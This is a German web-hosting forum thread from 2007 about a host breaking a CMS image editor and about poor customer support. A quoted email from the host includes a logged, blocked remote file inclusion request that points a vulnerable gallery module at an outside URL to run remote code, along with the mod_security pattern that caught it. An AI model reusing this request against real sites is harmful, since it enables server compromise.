Evanzo/Spaw, Kein einfügen von Bildern in Artikel mehr möglich

Begonnen von tuxxi, 11 Februar 2007, 10:10:01

⏪ vorheriges - nächstes ⏩

0 Mitglieder und 1 Gast betrachten dieses Thema.

tuxxi

denke mal, jeder der dieses cms einsetzt und bei evanzo den webspace hat, wird dieselben probs haben...

habe das ja dort auch mehrfach angesprochen, trotzdem hiess es beim nächsten anruf immer erstmal, die technik hat das prob behoben... :mad2:

wenn die mich wenigstens mal mit einem ihrer techniker verbinden würden...  aber egal wann ich da anrufe.. die techniker sind immer grad im gespräch...   wundert mich dann auch nicht mehr wirklich, wenn die nicht in der lage sind, dieses hausgemachte problem zufriedenstellend zu lösen...

dumm nur, das sich ja cms-systeme immer mehr durchsetzen, aber die gehen da wohl nur nach dem, was sie selber als vorkonfiguriert anbieten, unter anderem auch typo3...

naja.. morgen ist montag..  ein guter tag zum telefonieren  :BD: :BD: :BD:

breakdancer

#21
Sodele und hallo,

auch ich habe meinen Webspace bei Evanzo und auch bei mir das Gleiche Problem...

Nach dem Lesen dieses wahnsinns-Threads und auch bereits einiger einschlägiger Erfahrungen mit Levanzo und deren manchmal etwas - sagen wir mal - schleichenden Support-Verhaltens habe ich heute mal ein entsprechendes Schreiben aufgesetzt...

Den Inhalt darf ich leider nicht hier reinsetzen, Evanzo stuft das als vertraulich ein und verbietet die Publizierung.

Nur so viel: Da ich einen guten Bekannten hier bei 1 & 1 direkt im Ort habe und dort auch meine Internet-Flatrate fahre, würde mir der Wechsel nicht schwerfallen. Auch wenns ein bisschen teurer würde...

Ich hoffe, die Leute von Evanzo lesen endlich auch mal hier mit :-)

Gruss

Markus

xerraxde

Also mal ganz ehrlich Leute, was habt ihr bei dem Webauftritt von Evanzo und deren Preise erwartet?  :thumbup:

tuxxi

sorry xeraxxde, aber die aussage ist doch ein wenig schwach.

egal wieviel geld ich auch bezahle, bei unserer clubwebseite haben wir das powerweb mit einer laufzeit von 3 jahren abgeschlossen, so erwarte ich doch von einem anbieter, das er wenigstens seine technik und seine server beherrscht.

ich rege mich auch gar nicht so sehr darüber auf, das da einige funktionen nicht gehen sondern vielmehr über die art und weise, wie damit umgegangen wird.

und das findest du ziemlich oft und auch unabhängig von dem was du bezahlst.

bis zu der umstellung bei denen hat auch alles einwandfrei funktioniert und wenn ich da für weniger geld das bekomme, was mir reicht, warum soll ich dann mehr ausgeben.

schönen gruß stephan

xerraxde

Servicewüste Deutschland kann man da nur sagen. Ich hatte meinen Server früher bei Server4You und die waren auch nicht besser drauf, haben mir für alles mögliche Rechnungen geschickt, haben meinen Server manchmal einfach abgeschaltet und zum Schluss ging dann auch noch alle meine Daten flöten.

Nun habe ich einen Anbieter in den USA und bezahle für 10GB Platz und 100GB Traffic (Inklusive Domain und allen anderen SchnickSchnack) 4.99Dollar/Monat das sind 3.80€/Monat und das alles auch noch ohne Kreditkarte oder Lastschriftverfahren sondern über Paypal.

Ich habe 24Stunden Live-Ticket-Support. Bin echt begeistert und frage mich andauernd wieso ich nicht früher gewechselt habe.  :)

tuxxi

jepp, da hast recht...

habe meinen eigenen rootserver bei netdirekt, zahle da 15 € /monat, aber super erreichbarkeit, sehr guter support und wenn es mal irgendwo klemmt, bekommst wenigstens auch einen von der technik ans telefon.

Andi

Stop!

Wenn das jetzt in eine "ich hab den besten Anbieter" Diskussion abgleitet, schliesse ich den Thread.
schön´s Grüssle, Andi

HdH

Mhh, habe auch ein Projekt bei Evanzo, no Probleme mit Spaw...

MfG Peter
...hoffe das hilft!


tuxxi

hi peter,

habe mich grade auf deine hdh seite angemeldet...  bei dir geht es alles... :gruebel:

was hast du denn für ein packet bei evanzo???  wir haben das powerweb und da funzt es mittlerweile mal wieder nur mit dem firefox, mit dem ie geht nix...  mit dem firefox geht es auch nur, wenn du nicht angemeldet bist....

gruß stephan

HdH

Mhh, Paket? muss ich erst mal überlegen, ist ein uralt-Paket von vor 4 Jahren (4 Euro- Monat), gibt es mittlerweile nicht mehr... In etwa dürfte das Angebot von jetzt 5 Euro passen...
Ich denke mal, das es an den Server liegt, auf dem Dein Web gehostet ist, das dort nach dem Hack speziell was nicht mehr passt. Mein Web liegt sicher auf einen anderen Server...

MfG Peter
...hoffe das hilft!


tuxxi

könntest recht haben..  sollten die aber doch in den griff bekommen...

ist des ok, wenn ich auf deine hdh-seite verweise???  vielleicht hilfts denen ja...

gruß stephan

HdH

...hoffe das hilft!


tuxxi

super, danke dir...

wird von meiner seite aus der letzte versuch...  habe das ganze bei uns im club angebracht mit dem vorschlag, die seite auf meinen server umzuziehen... wurde dankend abgelehnt... :mad2:

wenn ich überlege, was ich in der letzten woche da rumgemacht habe... :puzzled:

aber egal, wenn sie nicht wollen...  ich pflege in solchen situationen immer zu sagen... meine webseite funktioniert ;)

schönen gruß...
stephan

Okimen

Hallo,
dachte eigentlich, das meine "Problemchen" durch einen KK Antrag und die Kündigung bei Evanzo gelöst wären.
Heute habe ich die anschließende Mail erhalten, wo meine Kündigung bedauert wird bla bla.
Dazu haben Sie dann geschrieben, das einige Angriffe auf mein verwendetes CMS stattgefunden haben sollen.
Ich kann damit wenig anfangen, aber vielleicht kann mir ja einer vom PragmaMX Support Team sagen was dar dran ist, und was ich davon halten soll.
Ach, schaut am besten selber!
--------------------------------------------------------------------------------------------------------------------------------
Sehr geehrter Herr Werner,

wir bedauern Ihren Entschluss zu kündigen.

Sollten Sie mit einer Leistung von uns oder mit der Serverperformance etc.
nicht zufrieden sein, können wir sicherlich Abhilfe schaffen.
Beschreiben Sie uns einfach Ihre Problematik an hostmaster@evanzo.net

Kündigungen können wir aus sicherheits- und haftungsrechtlichen Gründen nur schriftlich per Fax oder Postweg mit Ihrer Unterschrift akzeptieren.

Möchten Sie eine Domain auch beim zuständigen NIC löschen lassen, vermerken Sie bitte auf dem Schreiben die Kennung "CLOSE".

Achten sie bitte ggf. auch:

Hier hat jemand versucht Ihre Webseite anzugreifen (siehe ------->> )

==d5a51426==============================
Request: www.diweweb.de 207.155.174.194 - - [18/Nov/2006:15:49:03 +0100] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://cmdx2.by.ru/cmd
.gif? HTTP/1.1" 503 1022 "-" "libwww-perl/5.64" - "-"
Handler: type-map
----------------------------------------

------->>>> GET
------->>>> /modules/My_eGallery/public/displayCategory.php?adminpath=ht
------->>>> tp://cmdx2.by.ru/cmd.gif? HTTP/1.1

Connection: close
Host: www.diweweb.de
User-Agent: libwww-perl/5.64
mod_security-action: 503
mod_security-message: Access denied with code 503. Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\
x20?\\?" at REQUEST_URI [severity "EMERGENCY"]

HTTP/1.1 503 Service Temporarily Unavailable
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
--d5a51426--

Wir haben mehrere Angriffe dieser und anderer Art gegen Ihr CMS system in unseren Logs.

Dass kann auch ein Grund sein warum Ihre Seite nicht richtig funkioniert.

Wir bitten um Verständnis.
-----------------------------------------------------------------------------------------------------------------------------

Nur noch soviel, dass ändert nichts an meinem Entschluss mit dem KK Antrag usw.

Aber vielleicht kann mich ja mal jemand aufklären!

LG
Dirk

Andi

Hi :)

dieser dort aufgeführte Angriff auf eine Nuke-Modul ist schon dermassen alt, da findet man schon gar keine richtigen Informationen auf den einschlägigen SecuritySeiten...
Diese Lücke war in der pragmaMx Version der my-eGallery noch nie vorhanden.

Hier das habe ich noch gefunden:
- http://www.securityfocus.com/bid/9113/exploit
- http://archive.cert.uni-stuttgart.de/bugtraq/2003/12/msg00000.html
- http://www.pragmamx.org/Forum-topic9178.0.html
- http://www.rootforum.de/forum/viewtopic.php?p=137643


ZitatDass kann auch ein Grund sein warum Ihre Seite nicht richtig funkioniert.
Könnte, ist aber in dem Fall Unsinn.

Zitatmod_security-action: 503
mod_security-message: Access denied with code 503. Pattern match "=(http|www|ftp)\\:/(.+)\\.(c|dat|kek|gif|jpg|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)\\
x20?\\?" at REQUEST_URI [severity "EMERGENCY"]
HTTP/1.1 503 Service Temporarily Unavailable

Aha, mod_security....
geile Sache, aber die Konfiguration ist mit Sicherheit die Quelle des Übels. Da hupt bestimmt eine der Einstellungen rum.
schön´s Grüssle, Andi

Okimen

@Andi

Vielen Dank für Deine Antwort und die evtl. damit verbunden Mühe!
Das soll es von meiner Seite auch zum Thema Provider auch gewesen sein! :cool:

VG
Dirk

breakdancer

na denn...

Hey,

hatte ja auch von meinen Problemen berichtet und dass ich an Evanzo ne entsprechend dringende Anfrage geschrieben habe...

Das Problem wurde innerhalb von 6 Tagen gelöst, wobei die erste Rück-e-Mail von Evanzo drei Tage bei mir wegen Abwesenheit im Postfach lag.

Man hat die Admin-Rechte für mein System angefordert um sich die Module und alles einmal von Userseite anzuschauen. Ich habe dem Supporter einen Super-User-Account angelegt und nach zwei Tagen ist alles wieder gelaufen. Was auch immer Evanzo da serverseitig gemacht hat: Danke dafür !

Muss an dieser Stelle auch mal gesagt werden...

Lieben Gruss

Markus

Okimen

Ja ok,
genau das selbe durfte ich auch erleben.
Allerdings denke ich trotzdem dass mein Entschluss der richtige war!

VG Dirk